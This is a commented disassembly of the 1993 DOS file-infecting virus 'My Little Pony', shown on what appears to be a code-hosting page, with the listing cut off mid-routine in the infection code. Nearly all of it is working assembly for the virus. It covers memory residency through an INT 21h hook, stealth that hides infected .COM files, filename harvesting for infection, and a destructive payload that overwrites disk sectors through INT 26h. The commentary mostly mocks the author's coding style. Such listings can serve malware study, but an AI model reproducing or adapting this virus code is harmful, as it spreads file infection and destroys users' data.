📄 mlp1307b.asm
字号:
;My Little Pony v1.00 disassembly - sort of.
;By Cruel Entity of ANOI. Related to CyberCide.
;Well, the comments are a bit bitchy, probably coz I was in a really
;really bad mood when I wrote them. The virus author, Cruel Entity,
;knows how to make a nice virus, he just doesn't have enough assembly
;experience to make something really worth while, imho of course.
;Bummer: Still some loc_xxx's left, hrmpf, I won't care if you don't.
;Just dump this one in your misc. garbage area dude.. :-)
.model tiny
.code
org 100h
start:
call get_relative
get_relative:
pop bp
mov ax,0DD22h
int 21h ;Installation check.
cmp ax,3D33h
jne not_installed
;* lea dx, [bp+restore_carrier-get_relative]
db 08dh, 56h, 52h
jmp dx
not_installed:
mov ax,3521h
int 21h ;Get int21 vector
mov [bp+int21offset-get_relative],bx
mov [bp+int21seg-get_relative],es ;Store it.
mov ax,cs
dec ax
mov es,ax ;ES:0 points to MCB.
mov ax,es:[3]
sub ax,[bp+parasize-get_relative]
mov es:[3],ax ;Shrink blocksize.
mov ax,[bp+parasize-get_relative]
sub es:[12h],ax ;Free top mem.
mov es,es:[12h]
push es
lea si,[bp-3] ;SI points to start of
;virus.
mov di,100h
mov cx,[bp+virussize-get_relative]
rep movsb ;Copy virus up there.
pop ds
mov ax,2521h
mov dx, offset int21
int 21h ;Set new int21 vector.
restore_carrier:
push cs
push cs
pop ds
pop es
lea si,[bp+restore_bytes-get_relative]
mov cx,3
mov di,100h
rep movsb ;Restore host.
sub di,3
jmp di ;Restart host.
db 'Simple Simon met a pieman going to the fair said Simple Simon to '
db 'the pieman let me take your ware'
activate:
cmp dh,0 ;Seconds 0?
jne no_activate
cmp dl,5 ;Hundredth's less than 5?
ja no_activate
pushf
push bx
call get_random
mov cx,0Ah
xor dx,dx
div cx
mov dx,ax
mov al,2
mov cx,1
mov bx,offset anoi
kill_sector:
int 26h ;Sector write.
popf
inc al
cmp al, 25
jne kill_sector
pop bx
popf
jmp short no_activate
db '(c)1993 Cruel Entity'
int21:
pushf
cmp ax, 0dd22h
jz inst_chk
cmp ah,11h
jz fcb_stealth
cmp ah,12h
jz fcb_stealth
cmp ah,4eh
jz go_handle_stealth
cmp ah,4fh
jz go_handle_stealth
cmp ah,3dh
jz go_file_open
cmp ah,3eh
jz go_file_close
cmp ah,2ch
jz get_time
push ax
push cx
push dx
mov ah, 2ch ;Get DOS time.
int 21h
cmp cl,0
jz activate
no_activate:
pop dx
pop cx
pop ax
get_time:
cmp ah,36h
jne _pass_int
push bp
mov bp,offset loc_20
jmp bp
_pass_int:
popf ; Pop flags
pass_int:
db 0eah
int21offset dw 0
int21seg dw 0
go_handle_stealth:
push bp
mov bp,offset handle_stealth
jmp bp
go_file_open:
push bp
mov bp,offset file_open
jmp bp
go_file_close:
push bp
mov bp,offset file_close
jmp bp
inst_chk:
popf
mov ax,3D33h
iret
call_dos:
jmp dword ptr cs:[int21offset]
db 0C3h
fcb_stealth:
popf
pushf
push cs
call call_dos ;First let's see what
;DOS has to say..
cmp al,0FFh ;0FFH indicates
;no match found
je exit_fcb_stealth
match_found:
pushf
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
push bp ;Push the lot.
mov ah,2Fh
int 21h ;Get DTA
push es
pop ds ;DS:BX points to DTA.
mov si,bx ;DS:SI points to DTA.
add si,10h ;SI points to extension.
;<EXTENDED FCB ONLY!>
;(lamer)
lodsw
cmp ax,'OC' ;Extension starts with CO?
jne no_fcb_stealth
lodsb
cmp al,'M' ;Last char M?
jne no_fcb_stealth
mov si,bx
add si,26h ;I don't mean to sound
;bitchy, but IMO,
;ADD SI, 13h would've
;been what normal persons
;would've done.
;Offset 26h is a reserved
;position within an
;extended FCB.
;<INFECTION MARK>
lodsw
cmp ax,0 ;OR AX,AX? Naaaah!
jne no_fcb_stealth
mov si,bx
add si,1Eh ;offset 1eh is the high
;byte of file time.
lodsw
and al,1Fh
cmp al,0Ah
je proceed_fcb_stealth
mov dx,offset loc_17
jmp dx
proceed_fcb_stealth:
mov si,bx
add si,24h ;If I remember correctly,
;this is an undocumented
;copy of the filesize within
;the FCB structure. THIS
;is the value that is
;printed in a dir listing.
mov di,si
lodsw
sub ax,cs:virussize ;Hm, I can't seem to figure
jz no_fcb_stealth ;out if this guy is just
stosw ;stupid or ignorant when it
;comes to asm.
no_fcb_stealth:
pop bp
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
exit_fcb_stealth:
retf 2
db '%%% MY LITTLE PONY %%% '
db 'COPYRIGHT(C) 1993 A.N.O.I. %%%'
loc_17:
mov si,bx
add si,8
push cs
pop es
mov cx,0Ah
mov di,offset something
locloop_18:
cmp byte ptr es:[di],' '
je loc_19
add di,8
loop locloop_18
jmp short no_fcb_stealth
loc_19:
mov cx,8
rep movsb
jmp short no_fcb_stealth
loc_20:
pop bp
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
push bp ;Push some regs.
push cs
push cs
pop ds
pop es
mov di,offset something
mov cx,0Ah
locloop_21:
cmp byte ptr [di],' '
je loc_22
push di
push cx
mov si,di
call try_infect
pop cx
pop di
add di,8
loop locloop_21
loc_22:
push cs
pop es
mov di,offset something
mov cx,5Ch
mov al,' '
rep stosb
pop bp
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
jmp pass_int
try_infect: ;JESUS! It's actually
;a subroutine!!
;He knows what a sub
;IS!! Wow! I'm shocked!
mov di,offset filename
mov cx,8
copyloop2:
lodsb
cmp al,' '
je endcopy2
stosb
loop copyloop2
endcopy2:
mov al,'.'
stosb
mov al,'C'
stosb
mov al,'O'
stosb
mov al,'M'
stosb
mov al,0
stosb
push cs
pop ds
mov ax,4300h
mov dx,offset filename
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -